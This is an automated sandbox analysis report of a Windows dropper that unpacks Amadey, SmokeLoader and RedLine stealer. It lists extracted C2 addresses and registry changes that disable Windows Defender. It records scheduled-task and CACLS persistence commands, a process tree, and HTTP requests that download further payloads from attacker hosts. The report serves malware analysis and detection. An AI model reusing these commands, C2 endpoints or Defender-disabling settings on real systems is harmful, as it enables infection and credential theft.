Analysis
max time kernel: 151s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64 arch:x86 image:win10v2004-20230703-en locale:en-us os:windows10-2004-x64 system
submitted: 22/07/2023, 07:01 UTC
Static task: static1
Behavioral task: behavioral1
Sample: 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
Resource: win10v2004-20230703-en
General
Target: 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
Size: 514KB
MD5: 359185cd139e6394a2c2dadee1076043
SHA1: f7b24aff5b24c399611f10ab59708f81f4fe95ea
SHA256: 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa
SHA512: 6438e2ba152a2f45e292207480e71c0ed53b8ffe82e5ca4d3a2d2a914358c37f826692d8134fc899135019ec47cc7d57e84650b33d1a86a9c5e612b864027d05
SSDEEP: 12288:dMr7y90QVj5N59ZZxOQgRWiEBhXAcB3HvPvME8NFXMq:+yp1fSQgRWim5N8N6q
Malware Config
Extracted: amadey
Version: 3.85
C2: 77.91.68.3/home/love/index.php
Extracted: smokeloader
Version: 2022
C2: http://77.91.68.29/fks/
Extracted: redline
Botnet: grom
C2: 77.91.68.68:19071
auth_value: 9ec3129bff410b89097d656d7abc33dc
Signatures
Detects Healer, an antivirus disabler dropper (3 IoCs)
resource | yara_rule
behavioral1/files/0x00080000000231fc-152.dat | healer
behavioral1/files/0x00080000000231fc-153.dat | healer
behavioral1/memory/1824-154-0x00000000008F0000-0x00000000008FA000-memory.dmp | healer
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | a5274918.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | a5274918.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | a5274918.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | a5274918.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | a5274918.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | a5274918.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
SmokeLoader
Modular backdoor trojan in use since 2014.
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | b1952586.exe
Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | danke.exe
Key value queried | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation | 18DD.exe
Executes dropped EXE (10 IoCs)
pid | Process
3348 | v9546199.exe
5088 | v8993418.exe
1824 | a5274918.exe
3784 | b1952586.exe
2812 | danke.exe
4152 | c9824249.exe
60 | d8279993.exe
2468 | danke.exe
1836 | 18DD.exe
2956 | danke.exe
Loads dropped DLL (4 IoCs)
pid | Process
3416 | rundll32.exe
3792 | rundll32.exe
5088 | rundll32.exe
5088 | rundll32.exe
Windows security modification
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | a5274918.exe
Adds Run key to start application (2 TTPs, 6 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | v9546199.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | v9546199.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | v8993418.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | v8993418.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | c9824249.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | c9824249.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | c9824249.exe
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
880 | schtasks.exe
Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings | 18DD.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
1824 | a5274918.exe
1824 | a5274918.exe
4152 | c9824249.exe
4152 | c9824249.exe
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
3136 | Process not Found
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
3136 | Process not Found
Suspicious behavior: MapViewOfSection (1 IoCs)
pid | Process
4152 | c9824249.exe
Suspicious use of AdjustPrivilegeToken (19 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1824 | a5274918.exe
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Token: SeShutdownPrivilege | 3136 | Process not Found
Token: SeCreatePagefilePrivilege | 3136 | Process not Found
Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
3784 | b1952586.exe
Suspicious use of WriteProcessMemory (61 IoCs)
description | pid | Process | procid_target
PID 1096 wrote to memory of 3348 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 85
PID 1096 wrote to memory of 3348 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 85
PID 1096 wrote to memory of 3348 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 85
PID 3348 wrote to memory of 5088 | 3348 | v9546199.exe | 86
PID 3348 wrote to memory of 5088 | 3348 | v9546199.exe | 86
PID 3348 wrote to memory of 5088 | 3348 | v9546199.exe | 86
PID 5088 wrote to memory of 1824 | 5088 | v8993418.exe | 87
PID 5088 wrote to memory of 1824 | 5088 | v8993418.exe | 87
PID 5088 wrote to memory of 3784 | 5088 | v8993418.exe | 96
PID 5088 wrote to memory of 3784 | 5088 | v8993418.exe | 96
PID 5088 wrote to memory of 3784 | 5088 | v8993418.exe | 96
PID 3784 wrote to memory of 2812 | 3784 | b1952586.exe | 97
PID 3784 wrote to memory of 2812 | 3784 | b1952586.exe | 97
PID 3784 wrote to memory of 2812 | 3784 | b1952586.exe | 97
PID 3348 wrote to memory of 4152 | 3348 | v9546199.exe | 98
PID 3348 wrote to memory of 4152 | 3348 | v9546199.exe | 98
PID 3348 wrote to memory of 4152 | 3348 | v9546199.exe | 98
PID 2812 wrote to memory of 880 | 2812 | danke.exe | 99
PID 2812 wrote to memory of 880 | 2812 | danke.exe | 99
PID 2812 wrote to memory of 880 | 2812 | danke.exe | 99
PID 2812 wrote to memory of 4952 | 2812 | danke.exe | 101
PID 2812 wrote to memory of 4952 | 2812 | danke.exe | 101
PID 2812 wrote to memory of 4952 | 2812 | danke.exe | 101
PID 4952 wrote to memory of 2184 | 4952 | cmd.exe | 103
PID 4952 wrote to memory of 2184 | 4952 | cmd.exe | 103
PID 4952 wrote to memory of 2184 | 4952 | cmd.exe | 103
PID 4952 wrote to memory of 756 | 4952 | cmd.exe | 104
PID 4952 wrote to memory of 756 | 4952 | cmd.exe | 104
PID 4952 wrote to memory of 756 | 4952 | cmd.exe | 104
PID 4952 wrote to memory of 2160 | 4952 | cmd.exe | 105
PID 4952 wrote to memory of 2160 | 4952 | cmd.exe | 105
PID 4952 wrote to memory of 2160 | 4952 | cmd.exe | 105
PID 4952 wrote to memory of 1848 | 4952 | cmd.exe | 106
PID 4952 wrote to memory of 1848 | 4952 | cmd.exe | 106
PID 4952 wrote to memory of 1848 | 4952 | cmd.exe | 106
PID 4952 wrote to memory of 2880 | 4952 | cmd.exe | 107
PID 4952 wrote to memory of 2880 | 4952 | cmd.exe | 107
PID 4952 wrote to memory of 2880 | 4952 | cmd.exe | 107
PID 4952 wrote to memory of 3412 | 4952 | cmd.exe | 108
PID 4952 wrote to memory of 3412 | 4952 | cmd.exe | 108
PID 4952 wrote to memory of 3412 | 4952 | cmd.exe | 108
PID 1096 wrote to memory of 60 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 109
PID 1096 wrote to memory of 60 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 109
PID 1096 wrote to memory of 60 | 1096 | 44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe | 109
PID 2812 wrote to memory of 3416 | 2812 | danke.exe | 117
PID 2812 wrote to memory of 3416 | 2812 | danke.exe | 117
PID 2812 wrote to memory of 3416 | 2812 | danke.exe | 117
PID 3136 wrote to memory of 1836 | 3136 | Process not Found | 119
PID 3136 wrote to memory of 1836 | 3136 | Process not Found | 119
PID 3136 wrote to memory of 1836 | 3136 | Process not Found | 119
PID 1836 wrote to memory of 4180 | 1836 | 18DD.exe | 120
PID 1836 wrote to memory of 4180 | 1836 | 18DD.exe | 120
PID 1836 wrote to memory of 4180 | 1836 | 18DD.exe | 120
PID 4180 wrote to memory of 3792 | 4180 | control.exe | 122
PID 4180 wrote to memory of 3792 | 4180 | control.exe | 122
PID 4180 wrote to memory of 3792 | 4180 | control.exe | 122
PID 3792 wrote to memory of 2776 | 3792 | rundll32.exe | 123
PID 3792 wrote to memory of 2776 | 3792 | rundll32.exe | 123
PID 2776 wrote to memory of 5088 | 2776 | RunDll32.exe | 124
PID 2776 wrote to memory of 5088 | 2776 | RunDll32.exe | 124
PID 2776 wrote to memory of 5088 | 2776 | RunDll32.exe | 124
Processes
(process tree; the number in brackets is the nesting depth of the process)
[1] C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\44384b72c136bd6959407fbccecc45615d6638d30cfcac1b880f7fa0e4b232fa.exe"
    PID: 1096
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v9546199.exe
      PID: 3348
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v8993418.exe
        PID: 5088
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a5274918.exe
          PID: 1824
          - Modifies Windows Defender Real-time Protection settings
          - Executes dropped EXE
          - Windows security modification
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      [4] C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b1952586.exe
          PID: 3784
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"
            PID: 2812
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\schtasks.exe
              Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
              PID: 880
              - Creates scheduled task(s)
          [6] C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit
              PID: 4952
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                PID: 2184
            [7] C:\Windows\SysWOW64\cacls.exe
                Command line: CACLS "danke.exe" /P "Admin:N"
                PID: 756
            [7] C:\Windows\SysWOW64\cacls.exe
                Command line: CACLS "danke.exe" /P "Admin:R" /E
                PID: 2160
            [7] C:\Windows\SysWOW64\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                PID: 1848
            [7] C:\Windows\SysWOW64\cacls.exe
                Command line: CACLS "..\3ec1f323b5" /P "Admin:N"
                PID: 2880
            [7] C:\Windows\SysWOW64\cacls.exe
                Command line: CACLS "..\3ec1f323b5" /P "Admin:R" /E
                PID: 3412
          [6] C:\Windows\SysWOW64\rundll32.exe
              Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
              PID: 3416
              - Loads dropped DLL
    [3] C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c9824249.exe
        PID: 4152
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d8279993.exe
      PID: 60
      - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    PID: 2468
    - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Temp\18DD.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\18DD.exe
    PID: 1836
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\control.exe
      Command line: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
      PID: 4180
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\rundll32.exe
        Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
        PID: 3792
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\RunDll32.exe
          Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
          PID: 2776
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\rundll32.exe
            Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\C~4FhR.CPl",
            PID: 5088
            - Loads dropped DLL
[1] C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe
    PID: 2956
    - Executes dropped EXE
Network

Remote address: 8.8.8.8:53
Request: 146.78.124.51.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 8.3.197.209.in-addr.arpa IN PTR
Response: 8.3.197.209.in-addr.arpa IN PTR vip0x008map2sslhwcdnnet

Remote address: 8.8.8.8:53
Request: 23.159.190.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 55.36.223.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 208.240.110.104.in-addr.arpa IN PTR
Response: 208.240.110.104.in-addr.arpa IN PTR a104-110-240-208deploystaticakamaitechnologiescom

Remote address: 77.91.68.3:80
Request:
POST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

Remote address: 8.8.8.8:53
Request: 3.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 3.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 3.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fpeumd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pmfwrats.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 192
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 8.8.8.8:53
Request: 29.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 29.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 29.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 88.156.103.20.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 59.128.231.4.in-addr.arpa IN PTR
Response: (empty)

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sneqxkmhcg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 248
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 77.91.68.3:80
Request:
GET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1

Remote address: 77.91.68.3:80
Request:
GET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nihtya.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 8.8.8.8:53
Request: 11.227.111.52.in-addr.arpa IN PTR
Response: (empty)

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://grdguk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 197
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 77.91.68.29:80
Request:
POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://opilmtwth.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

Remote address: 77.91.68.30:80
Request:
GET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 22 Jul 2023 06:50:34 GMT
ETag: "184e8e-6010dcc4c0280"
Accept-Ranges: bytes
Content-Length: 1592974
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

Remote address: 8.8.8.8:53
Request: 30.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 30.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 30.68.91.77.in-addr.arpa IN PTR
Response: (empty)

Remote address: 8.8.8.8:53
Request: 27.178.89.13.in-addr.arpa IN PTR
Response: (empty)
Traffic summary (one block per flow; the first line of each block is the flow's size and packet figures as reported)

515 B 365 B 6 5
HTTP Request: POST http://77.91.68.3/home/love/index.php
HTTP Response: 200

260 B 5

1.4kB 842 B 9 9
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404

260 B 5

260 B 5

834 B 510 B 7 6
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404

260 B 5

3.9kB 94.8kB 76 74
HTTP Request: GET http://77.91.68.3/home/love/Plugins/cred64.dll
HTTP Response: 404
HTTP Request: GET http://77.91.68.3/home/love/Plugins/clip64.dll
HTTP Response: 200

260 B 5

820 B 510 B 7 6
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404

260 B 5

1.5kB 1.2kB 10 9
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404
HTTP Request: POST http://77.91.68.29/fks/
HTTP Response: 404

56.4kB 1.6MB 1090 1176
HTTP Request: GET http://77.91.68.30/fuzz/raman.exe
HTTP Response: 200

260 B 5

260 B 5

72 B 158 B 1 1
DNS Request: 146.78.124.51.in-addr.arpa

70 B 111 B 1 1
DNS Request: 8.3.197.209.in-addr.arpa

72 B 158 B 1 1
DNS Request: 23.159.190.20.in-addr.arpa

73 B 144 B 1 1
DNS Request: 95.221.229.192.in-addr.arpa

71 B 157 B 1 1
DNS Request: 55.36.223.20.in-addr.arpa

74 B 141 B 1 1
DNS Request: 208.240.110.104.in-addr.arpa

207 B 207 B 3 3
DNS Request: 3.68.91.77.in-addr.arpa
DNS Request: 3.68.91.77.in-addr.arpa
DNS Request: 3.68.91.77.in-addr.arpa

210 B 210 B 3 3
DNS Request: 29.68.91.77.in-addr.arpa
DNS Request: 29.68.91.77.in-addr.arpa
DNS Request: 29.68.91.77.in-addr.arpa

72 B 158 B 1 1
DNS Request: 88.156.103.20.in-addr.arpa

71 B 157 B 1 1
DNS Request: 59.128.231.4.in-addr.arpa

72 B 158 B 1 1
DNS Request: 11.227.111.52.in-addr.arpa

210 B 210 B 3 3
DNS Request: 30.68.91.77.in-addr.arpa
DNS Request: 30.68.91.77.in-addr.arpa
DNS Request: 30.68.91.77.in-addr.arpa

71 B 145 B 1 1
DNS Request: 27.178.89.13.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Downloads